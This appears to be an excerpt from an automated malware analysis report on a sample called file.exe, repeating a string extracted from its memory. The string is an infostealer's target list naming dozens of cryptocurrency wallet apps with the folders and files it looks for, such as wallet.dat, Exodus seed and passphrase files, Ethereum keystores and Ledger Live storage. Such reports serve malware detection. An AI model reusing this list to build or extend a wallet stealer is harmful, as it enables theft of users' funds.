Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2684323133.0000000000985000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Ethereum\
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2684323133.0000000000985000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2684323133.0000000000A37000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2684323133.0000000000985000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
Source: file.exe, 00000000.00000002.2685963034.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
